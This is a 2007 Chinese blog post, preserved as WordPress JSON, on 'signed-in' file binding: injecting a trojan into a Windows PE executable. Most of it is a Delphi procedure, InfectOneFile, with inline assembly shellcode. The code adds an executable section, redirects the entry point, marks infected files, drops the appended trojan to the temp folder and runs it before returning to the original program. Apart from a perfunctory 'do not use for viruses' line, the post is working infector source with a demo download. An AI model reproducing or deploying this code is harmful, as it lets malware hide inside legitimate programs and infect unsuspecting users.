{"id":87,"date":"2007-11-04T11:11:06","date_gmt":"2007-11-04T03:11:06","guid":{"rendered":"http:\/\/www.2lin.net\/?p=87"},"modified":"2007-11-04T11:11:06","modified_gmt":"2007-11-04T03:11:06","slug":"87","status":"publish","type":"post","link":"https:\/\/www.2lin.top\/?p=87","title":{"rendered":"\u6587\u4ef6\u6346\u7ed1\uff08\u4e8c\uff09"},"content":{"rendered":"

\u4e0a\u6b21\u5199\u5230\u4f7f\u7528\u9644\u52a0\u6346\u7ed1\u6587\u4ef6\u7684\u65b9\u5f0f.\u3000\u8fd9\u6b21\u4ecb\u7ecd\u4f7f\u7528\u7b7e\u5165\u5f0f\u6346\u7ed1
\u7b7e\u5165\u5f0f\u6346\u7ed1\u7684\u539f\u7406\u4e5f\u5f88\u7b80\u5355\uff0c
\u4e5f\u662f\u628a\u6728\u9a6c\u7a0b\u5e8f\u9644\u52a0\u5230\u7a0b\u5e8f\u5c3e\u90e8\u3000\u7136\u540e\u5728\u539f\u7a0b\u5e8f\u91cc\u6dfb\u52a0\u4e00\u4e2a\u4ee3\u7801\u8282
\u7528\u6765\u628a\u6728\u9a6c\u7a0b\u5e8f\u91ca\u653e\u51fa\u6765.\u3000\u6700\u540e\u5c06\u539f\u7a0b\u5e8f\u7684\u5165\u53e3\u70b9\u6539\u6210\u6dfb\u52a0\u8282\u7684\u8d77\u59cb\u5730\u5740
\u7531\u4e8e\u8fd9\u79cd\u8bd5\u4f1a\u6539\u53d8\u539f\u7a0b\u5e8f\u7684\u5927\u5c0f\uff0c\u5e76\u4e14\u548c\u7a0b\u5e8f\u8fd0\u884c\u7684\u73af\u5883\u6709\u5173.
\u6240\u4ee5\u3000.net\u6216\u5176\u5b83\u7684\u865a\u62df\u673a\u7a0b\u5e8f\u662f\u4e0d\u80fd\u88ab\u8fd0\u884c\u7684.
\u8fd8\u6709\u4e00\u79cd\u5c31\u662f\u6709\u9644\u52a0\u6570\u636e\u7684\u7a0b\u5e8f\u3000\u3000\u56e0\u4e3a\u6539\u53d8\u4e86\u6587\u4ef6\u7684\u5927\u5c0f\u3000\u5982\u679c\u5f3a\u884c\u6346\u7ed1\u3000\u6709\u53ef\u80fd\u4f1a\u4f7f\u539f\u7a0b\u5e8f\u6267\u884c\u51fa\u9519.
\u4e0b\u9762\u7ed9\u51fa\u6346\u7ed1\u4ee3\u7801\uff08\u8bf7\u52ff\u7528\u4e8e\u75c5\u6bd2\u4f20\u64ad\uff09Demo\u4e0b\u8f7d<\/a><\/p>\n

procedure InfectOneFile(ASrcFileName,ADesFileName: string; const isCheck: Boolean = true);\nvar\n  I: integer;\n  F,F1: THandle;\n  dReadNum: DWORD;\n  DosHeader: TImageDosHeader;\n  NTHeader: TImageNtHeaders; {NtHeader}\n  NewSectionHeader,SEChea: TImageSectionHeader;\n  nOldSectionNo: Integer;{\u8282\u6570\u76ee}\n OEP: Integer; {\u5165\u53e3\u70b9}\n SectionAlign: Integer; {\u8282\u5bf9\u9f50}\n FileAlign: Integer; {\u6587\u4ef6\u5bf9\u9f50}     \n  Data: TDatas;\n  pShell: PChar;\n  nShellLen, nNewImageSize, nNewSizeofCode: Integer;\n  jmp: BYTE;\n  buf: array[0..$1000] of byte;\n  TempPath: string;\n  FileSize: Integer;\n  label shellend, shell, Search, QUIT,RE;\nbegin\n  TempPath := '';\n  F := CreateFile(PChar(ADesFileName), GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING, 0, 0);\n  try\n    \/\/\u6253\u5f00\u5931\u8d25\u9000\u51fa\n    if F = INVALID_HANDLE_VALUE then\n    begin\n      {$IFDEF DEBUG} AddLog('\u6253\u5f00\u6587\u4ef6\u5931\u8d25'+ADesFileName); {$ENDIF} \n      Exit;\n    end;\n    \/\/\u68c0\u67e5\u662f\u5426PE\u6587\u4ef6\n    ReadFile(F, DosHeader, SizeOf(TImageDosHeader), dReadNum, nil);       \n    if not DosHeader.e_magic = IMAGE_DOS_SIGNATURE then\n    begin\n      {$IFDEF DEBUG} AddLog('\u4e0d\u662fPE\u6587\u4ef6'+ADesFileName); {$ENDIF} \n      Exit;\n    end;\n    \n    SetFilePointer(F, $30, nil, FILE_BEGIN);\n    ReadFile(F, Data, SizeOf(TDatas), dReadNum, nil);\n    if Data.ID = $88888888 then  {\u5df2\u7ecf\u88ab\u9644\u52a0}\n    begin\n      {$IFDEF DEBUG} AddLog('\u5df2\u7ecf\u611f\u67d3'+ADesFileName); {$ENDIF} \n      Exit;\n    end;\n    \/\/\u8bfb\u53d6NTHeader\n    SetFilePointer(F, DosHeader._lfanew, nil, FILE_BEGIN);\n    ReadFile(F, NTHeader, SizeOf(NTHeader), dReadNum, nil);\n    if NTHeader.Signature <> IMAGE_NT_SIGNATURE then Exit;\n    if (NTHeader.FileHeader.Characteristics = $10E) and isCheck then\n    begin\n      {$IFDEF DEBUG} AddLog('.net\u6216\u5176\u5b83\u6587\u4ef6'+ADesFileName); {$ENDIF}\n      Exit; \/\/.net \u6216\u5176\u5b83\u6587\u4ef6\u3000\u4e0d\u80fd\u9644\u52a0\n    end;\n    nOldSectionNo := NTHeader.FileHeader.NumberOfSections;\n    OEP := NTHeader.OptionalHeader.AddressOfEntryPoint;\n    SectionAlign := NTHeader.OptionalHeader.SectionAlignment;\n    FileAlign := NTHeader.OptionalHeader.FileAlignment;\n    ZeroMemory(@NewSectionHeader, SizeOf(TImageSectionHeader));\n    \/\/\u8bfb\u53d6\u6700\u540e\u4e00\u4e2a\u8282\u5934\n    SetFilePointer(F, DosHeader._lfanew+SizeOf(TImageNtHeaders), nil, FILE_BEGIN);\n    for i := 0 to nOldSectionNo - 1 do\n       ReadFile(F, SEChea, SizeOf(TImageSectionHeader), dReadNum, nil);\n    FileSize := GetFileSize(F, nil);   \n    if (FileSize <> SEChea.PointerToRawData + SEChea.SizeOfRawData) and isCheck then \n    begin  \/\/\u6709\u9644\u52a0\u6570\u636e\u4e0d\u80fd\u9644\u52a0\n      {$IFDEF DEBUG} AddLog('.\u6709\u9644\u52a0\u6570\u636e\u4e0d\u80fd\u611f\u67d3'+ADesFileName); {$ENDIF}\n      Exit;\n    end;\n    goto shellend; \n    asm\n    shell:\n      pushad\n      mov eax, fs:$30  \/\/;PEB\u7684\u5730\u5740\n    mov eax, [eax + $0c]\n      mov esi, [eax + $1c]\n      lodsd\n      mov eax, [eax + $08] \/\/;eax\u5c31\u662fkernel32.dll\u7684\u57fa\u5740\n      mov edi, eax \/\/\u540c\u65f6\u4fdd\u5b58kernel32.dll\u7684\u57fa\u5740\u5230edi\n  \n    \/\/\u901a\u8fc7\u641c\u7d22 kernel32.dll\u7684\u5bfc\u51fa\u8868\u67e5\u627eGetProcAddress\u51fd\u6570\u7684\u5730\u5740\n      mov ebp, eax\n      mov eax, [ebp + $3c]\n      mov edx, [ebp + eax + $78]\n      add edx, ebp\n      mov ecx, [edx + $18]\n      mov ebx, [edx + $20]\n      add ebx, ebp\n  \n      Search:\n        dec ecx\n        mov esi, [ebx + ecx * 4]\n        add esi, ebp\n        mov eax, $50746547\n        cmp [esi], eax  \/\/\u6bd4\u8f83"PteG"\n        jne Search\n        mov eax, $41636f72\n        cmp [esi + 4], eax\n        jne Search\n        mov ebx, [edx + $24]\n        add ebx, ebp\n        mov cx, [ebx + ecx * 2]\n        mov ebx, [edx + $1c]\n        add ebx, ebp\n        mov eax, [ebx + ecx * 4]\n        add eax, ebp  \/\/eax\u4fdd\u5b58\u7684\u5c31\u662fGetProcAddress\u7684\u5730\u5740  \n        \/\/\u4e3a\u5c40\u90e8\u53d8\u91cf\u5206\u914d\u7a7a\u95f4\n        push ebp\n        sub esp, $50\n        mov ebp, esp\n        \n        mov [ebp + $10], eax \/\/\u628aGetProcAddress\u7684\u5730\u5740\u4fdd\u5b58\u5230ebp + 10\u4e2d \n        \/\/\u67e5\u627e  GlobalAlloc\n        push DWORD PTR $636F6C\n        push DWORD PTR $6C416C61\n        push DWORD PTR $626F6C47\n        push esp\n        push edi\n        call [ebp + $10]\n        \/\/mov [ebp + $14], eax \/\/\u4fdd\u5b58GlobalAlloc\u7684\u5730\u5740\u5230ebp + 14h\n        push $1000 \/\/\u5206\u914d$1000\u7a7a\u95f4\u5185\u5b58\n        push GHND\n        call eax\n        mov [ebp + $4C], eax\/\/\u4fdd\u5b58hMem\n        mov eax, [eax]  \/\/\n        mov [ebp + $4], eax\n        \/\/mov [ebp + $14], eax \/\/\u4fdd\u5b58\u6307\u9488   \n        \/\/mov eax, edx         \n        mov [eax],DWORD PTR $61657243\n        add eax, 4\n        mov [eax],DWORD PTR $69466574                 \n        add eax, 4\n        mov [eax],DWORD PTR $41656C\n        \n      \/\/\u5f00\u59cb\u67e5\u627eCreateFileA\u7684\u5730\u5740, \u5148\u6784\u9020"CreateFileA\\0"\n        push [ebp + $4] \/\/\u538b\u5165"CreateFileA\\0"\u7684\u5730\u5740\n        push edi \/\/edi:kernel32\u7684\u57fa\u5740\n        call [ebp + $10] \/\/\u8fd4\u56de\u503c(\u5373CreateFileA\u7684\u5730\u5740)\u4fdd\u5b58\u5728eax\u4e2d\n        mov [ebp + $14], eax \/\/\u4fdd\u5b58CreateFileA\u7684\u5730\u5740\u5230ebp + 14h         \n        \n        \/\/\u5f00\u59cb\u67e5\u627eReadFile\u7684\u5730\u5740\n        mov eax, [ebp + $4]         \n        mov [eax],DWORD PTR $64616552\n        add eax, 4\n        mov [eax],DWORD PTR $656C6946\n        add eax, 4\n        mov [eax],DWORD PTR $0\n                \n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $18], eax \/\/\u4fdd\u5b58ReadFile\u7684\u5730\u5740\u5230ebp + 18h\n        \n        \/\/\u67e5\u627e WriteFile\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $74697257\n        add eax, 4\n        mov [eax],DWORD PTR $6C694665\n        add eax, 4\n        mov [eax],DWORD PTR $65\n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $1C], eax \/\/\u4fdd\u5b58WriteFile\u7684\u5730\u5740\u5230ebp + 1Ch\n        \/\/\u67e5\u627eGetModuleFileNameA\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $4D746547\n        add eax, 4\n        mov [eax],DWORD PTR $6C75646F\n        add eax, 4\n        mov [eax],DWORD PTR $6C694665\n        add eax, 4\n        mov [eax],DWORD PTR $6D614E65\n        add eax, 4\n        mov [eax],DWORD PTR $4165\n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $20], eax \/\/\u4fdd\u5b58GetModuleFileNameA\u7684\u5730\u5740\u5230ebp + 20h\n        \/\/\u67e5\u627eSetFilePointer\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $46746553\n        add eax, 4\n        mov [eax],DWORD PTR $50656C69\n        add eax, 4\n        mov [eax],DWORD PTR $746E696F\n        add eax, 4\n        mov [eax],DWORD PTR $7265         \n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $24], eax \n        \/\/\u67e5\u627e GetTempPathA\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $54746547\n        add eax, 4\n        mov [eax],DWORD PTR $50706D65\n        add eax, 4\n        mov [eax],DWORD PTR $41687461\n        add eax, 4\n        mov [eax],DWORD PTR $0\n        \n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $28], eax\n        \/\/\u67e5\u627eCloseHandle\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $736F6C43\n        add eax, 4\n        mov [eax],DWORD PTR $6E614865\n        add eax, 4\n        mov [eax],DWORD PTR $656C64\n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $2C], eax\n        \/\/\u67e5\u627eWinExec\n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $456E6957\n        add eax, 4\n        mov [eax],DWORD PTR $636578\n        push [ebp + $4]\n        push edi\n        call [ebp + $10]\n        mov [ebp + $30], eax \n        \/\/\u83b7\u53d6\u6587\u4ef6\u540d\n        push $FF\n        \/\/lea eax, [ebp + $4]\n        push [ebp + $4]\n        push DWORD PTR $0\n        call [ebp + $20] \/\/GetModuleFileName    \n        \/\/\u6253\u5f00\u6587\u4ef6\n        push $0\n        push $0\n        push OPEN_EXISTING\n        push $0\n        push FILE_SHARE_READ\n        push GENERIC_READ  \n        push [ebp + $4]\n        call [ebp + $14]\n        mov [ebp + $34], eax \/\/\u4fdd\u5b58\u6587\u4ef6\u53e5\u67c4\n        cmp eax, $FFFFFFFF  \/\/\u6253\u5f00\u5931\u8d25\n        jz QUIT\n        \/\/SetFilePointer $30\n        push $0\n        push $0\n        push $30\n        push [ebp + $34]\n        call [ebp + $24] \/\/SetFilePointer\n        \/\/ReadFile ID\n        push $0\n        mov eax, [ebp + $4]\n        push eax\n        push $4\n        add eax, 4\n        push eax\n        push [ebp + $34]\n        call [ebp + $18] \/\/ReadFile ID\n        mov eax, [ebp + $4]\n        add eax, 4\n        cmp [eax], $88888888\n        jnz QUIT\n        \/\/ReadFile Offset\n        push $0\n        mov eax,[ebp + $4]\n        push eax\n        push $4\n        add eax, 4\n        push eax \/\/Offset\n        push [ebp + $34]\n        call [ebp + $18]\n        \n        \/\/ReadFile  Size\n        push $0\n        mov eax,[ebp + $4]\n        push eax\n        push $4\n        add eax, 8\n        push eax \/\/Size\n        push [ebp + $34]\n        call [ebp + $18]\n        \/\/SetFilePointer OffSet\n        push $0\n        push $0\n        mov eax, [ebp + $4]\n        add eax, 4\n        push [eax]\n        push [ebp + $34]\n        call [ebp + $24]\n        mov eax,[ebp + $4]\n        add eax, $C\n        push eax\n        push $FF\n        call [ebp + $28] \/\/TempPath\n        mov edx,[ebp + $4]\n        add edx, $C \n        add eax, edx          \n        mov [eax],DWORD PTR $2E656d69\n        add eax, 4\n        mov [eax],DWORD PTR $657865\n        \n        \/\/\u6253\u5f00\u6587\u4ef6\n        push $0\n        push $0\n        push CREATE_ALWAYS\n        push $0\n        push $0\n        push GENERIC_WRITE\n        push edx \n        call [ebp + $14]  \/\/CreateFile NewFile\n        mov [ebp + $44], eax \/\/\u4fdd\u5b58\u6587\u4ef6\u53e5\u67c4\n        cmp eax, $FFFFFFFF\n        jz QUIT\n    RE: \/\/ReadFile\n        push $0\n        mov eax,[ebp + $4]\n        push eax\n        push $FF\n        add eax, $C\n        add eax, $FF\n        push eax\/\/Buff\n        push [ebp + $34]\n        call [ebp + $18] \/\/ReadFile\n        \/\/WriteFile\n        push $0\n        mov eax,[ebp + $4]\n        push eax\n        push [eax]\n        add eax, $C\n        add eax, $FF\n        push  eax\/\/Buff\n        push [ebp + $44]\n        call [ebp + $1C]\n        mov eax, [ebp + $4]\n        cmp [eax], 0\n        jnz RE\n        push [ebp + $44]\n        call [ebp + $2c] \/\/\u5173\u95ed\u65b0\u6587\u4ef6\u53e5\u67c4\n        \n        push [ebp + $34]\n        call [ebp + $2c] \/\/\u5173\u95ed\u6587\u4ef6\u53e5\u67c4\n        \/\/\u8fd0\u884c\u7a0b\u5e8f\n        (\u8fd9\u91cc\u7701\u7565\u4e00\u90e8\u5206)        \n        \/\/\u91ca\u653e\u5185\u5b58   \n        mov eax, [ebp + $4]\n        mov [eax],DWORD PTR $626F6C47\n        add eax, 4\n        mov [eax],DWORD PTR $72466C61\n        add eax, 4\n        mov [eax],DWORD PTR $6565\n        push [ebp + $4]\n        push edi\n        call [ebp + $10]  \/\/GlobalFree\n        push [ebp + $4C]\n        call eax\n                \n    QUIT:  mov esp, ebp\n        add esp, $50\n        popad\n    end;\n    shellend:\n    asm\n      LEA EAX,shell\n    MOV pShell,EAX;\n    LEA EBX,shellend\n     SUB EBX,EAX\n     MOV nShellLen,EBX\n    end;\n    FileSize := GetFileSize(F, nil);\n    SetFilePointer(F, SEChea.PointerToRawData + SEChea.SizeOfRawData, nil, FILE_BEGIN);\n    if FileSize <> SEChea.PointerToRawData + SEChea.SizeOfRawData then \/\/\u6709\u9644\u52a0\u6570\u636e\n    begin\n      \/\/\u5c06\u9644\u52a0\u6570\u636e\u5199\u5165\u4e34\u65f6\u6587\u4ef6\n      TempPath := GetTempDir + '{3B034D2C-A7B4-47D0-BA07-988E9359649D}';\n      F1 := CreateFile(PChar(TempPath), GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);\n      try\n        if F1 = INVALID_HANDLE_VALUE then Exit;\n        repeat\n           ReadFile(F, buf, sizeOf(buf), dReadNum, nil);\n           WriteFile(F1, buf, dReadNum, dReadNum, nil);\n        until dReadNum = 0;\n      finally\n         CloseHandle(F1);\n      end;\n    end;\n    \/\/\u5199\u5165\u4ee3\u7801\n    SetFilePointer(F, SEChea.PointerToRawData + SEChea.SizeOfRawData, nil, FILE_BEGIN);\n    \/\/\u539f\u6765\u7684\u6587\u4ef6\u6ca1\u6709\u5bf9\u9f50\n    if Align(SEChea.SizeOfRawData, FileAlign) <>  SEChea.SizeOfRawData then\n    begin\n      jmp := $00;\n     for i := 0 to Align(SEChea.SizeOfRawData,FileAlign) - SEChea.SizeOfRawData - 1 do\n       WriteFile(F, jmp, 1, dReadNum, nil);\n    end;\n    WriteFile(F, pShell^, nShellLen, dReadNum, nil);\n    \/\/SHELLCODE\u4e4b\u540e\u662f\u8df3\u8f6c\u5230\u539fOEP\u7684\u6307\u4ee4\n   NewSectionHeader.VirtualAddress := SEChea.VirtualAddress\n                          + Align(SEChea.Misc.VirtualSize,SectionAlign);\n   jmp := $E9;\n   OEP := OEP - (NewSectionHeader.VirtualAddress + nShellLen) - 5;\n   WriteFile(F, jmp, sizeof(jmp), dReadNum, nil);\n   WriteFile(F, OEP, sizeof(OEP), dReadNum, nil);\n   \/\/\u5c06\u6700\u540e\u589e\u52a0\u7684\u6570\u636e\u75280\u586b\u5145\u81f3\u6309\u6587\u4ef6\u4e2d\u5bf9\u9f50\u7684\u5927\u5c0f\n    jmp := $00;\n    for i:=0 to Align(nShellLen,FileAlign) - nShellLen - 6 do\n       WriteFile(F, jmp, 1, dReadNum, nil);\n   \/\/\u65b0\u533a\u5757\u4e2d\u7684\u6570\u636e\n   Move('.data', NewSectionHeader.Name, 5);\n   NewSectionHeader.PointerToRawData := SEChea.PointerToRawData + Align(SEChea.SizeOfRawData, FileAlign);\n   NewSectionHeader.Misc.VirtualSize := nShellLen;\n   NewSectionHeader.SizeOfRawData := Align(nShellLen, FileAlign);\n   NewSectionHeader.Characteristics := $E0000020;\/\/\u65b0\u533a\u5757\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\n    \n    SetFilePointer(F, DosHeader._lfanew + SizeOf(TImageNtHeaders) + SizeOf(TImageSectionHeader) * nOldSectionNo, nil, FILE_BEGIN);\n   \/\/\u5199\u5165\u65b0\u7684\u5757\u8868\n   WriteFile(F, NewSectionHeader,SizeOf(TImageSectionHeader),dReadNum, nil);\n   nNewImageSize := NTHeader.OptionalHeader.SizeOfImage + Align(nShellLen, SectionAlign);\n   nNewSizeofCode := NTHeader.OptionalHeader.SizeOfCode + Align(nShellLen, FileAlign);\n   NTHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress := 0;\n   NTHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size := 0;\n   NTHeader.OptionalHeader.SizeOfCode := nNewSizeofCode;\n    NTHeader.OptionalHeader.SizeOfImage := nNewImageSize;\n   NTHeader.FileHeader.NumberOfSections := nOldSectionNo + 1;\n   NTHeader.OptionalHeader.AddressOfEntryPoint := NewSectionHeader.VirtualAddress;\n    \/\/\u5199\u5165\u66f4\u65b0\u540e\u7684PE\u5934\u7ed3\u6784\n    SetFilePointer(F, DosHeader._lfanew, nil, FILE_BEGIN);\n   WriteFile(F, NTHeader ,Sizeof(TImageNTHeaders), dReadNum, nil);\n    if TempPath <> '' then  \/\/\u5c06\u9644\u52a0\u6570\u636e\u5199\u56de\u6765\n    begin\n      F1 := CreateFile(PChar(TempPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);\n      try\n        if F1 = INVALID_HANDLE_VALUE then Exit;\n        SetFilePointer(F, NewSectionHeader.SizeOfRawData + NewSectionHeader.PointerToRawData, nil, FILE_BEGIN);\n        repeat\n           ReadFile(F1, buf, sizeOf(buf), dReadNum, nil);\n           WriteFile(F, buf, dReadNum, dReadNum, nil);\n        until dReadNum = 0;\n      finally\n         CloseHandle(F1);\n         DeleteFile(PChar(TempPath));\n      end;\n    end;\n    \/\/\u5199\u5165\u9644\u52a0\u6570\u636e\n    F1 := CreateFile(PChar(ASrcFileName), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);\n    try\n      if F1 = INVALID_HANDLE_VALUE then\n      begin\n        {$IFDEF DEBUG} AddLog('\u6253\u5f00\u6e90\u6587\u4ef6\u5931\u8d25'+ASrcFileName); {$ENDIF}\n        Exit;\n      end;\n      Data.ID := $88888888;\n      Data.Offset := NewSectionHeader.SizeOfRawData + NewSectionHeader.PointerToRawData;\n      Data.Size := GetFileSize(F1, nil);\n      SetFilePointer(F, $30, nil, FILE_BEGIN);\n      WriteFile(F, Data, SizeOf(TDatas), dReadNum, nil);\n      SetFilePointer(F, 0, nil, FILE_END);\n      SetFilePointer(F1, 0, nil, FILE_BEGIN);\n      repeat\n         ReadFile(F1, buf, sizeOf(buf), dReadNum, nil);\n         WriteFile(F, buf, dReadNum, dReadNum, nil);\n      until dReadNum = 0;\n    finally\n       CloseHandle(F1);   \n    end;\n  finally\n    CloseHandle(F);\n  end;\n  {$IFDEF DEBUG} AddLog(ASrcFileName+'\u611f\u67d3\u6210\u529f'+ADesFileName); {$ENDIF}\nend;<\/pre>\n
——————————————————————————–
\u3010\u7248\u6743\u58f0\u660e\u3011: \u672c\u6587\u539f\u521b\u4e8ehttp:\/\/2Lin.net<\/a>, \u8f6c\u8f7d\u8bf7\u6ce8\u660e\u4f5c\u8005\u5e76\u4fdd\u6301\u6587\u7ae0\u7684\u5b8c\u6574, \u8c22\u8c22!<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e0a\u6b21\u5199\u5230\u4f7f\u7528\u9644\u52a0\u6346\u7ed1\u6587\u4ef6\u7684\u65b9\u5f0f.\u3000\u8fd9\u6b21\u4ecb\u7ecd\u4f7f\u7528\u7b7e\u5165\u5f0f\u6346\u7ed1\u7b7e\u5165\u5f0f\u6346\u7ed1\u7684\u539f\u7406\u4e5f\u5f88\u7b80\u5355\uff0c\u4e5f\u662f\u628a\u6728\u9a6c\u7a0b\u5e8f\u9644\u52a0\u5230\u7a0b\u5e8f\u5c3e\u90e8\u3000\u7136\u540e\u5728\u539f\u7a0b\u5e8f\u91cc\u6dfb\u52a0\u4e00\u4e2a\u4ee3\u7801\u8282\u7528\u6765\u628a\u6728\u9a6c\u7a0b\u5e8f\u91ca\u653e\u51fa\u6765.\u3000\u6700\u540e\u5c06\u539f\u7a0b...<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"https:\/\/www.2lin.top\/index.php?rest_route=\/wp\/v2\/posts\/87"}],"collection":[{"href":"https:\/\/www.2lin.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.2lin.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.2lin.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.2lin.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=87"}],"version-history":[{"count":0,"href":"https:\/\/www.2lin.top\/index.php?rest_route=\/wp\/v2\/posts\/87\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.2lin.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=87"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.2lin.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=87"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.2lin.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=87"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}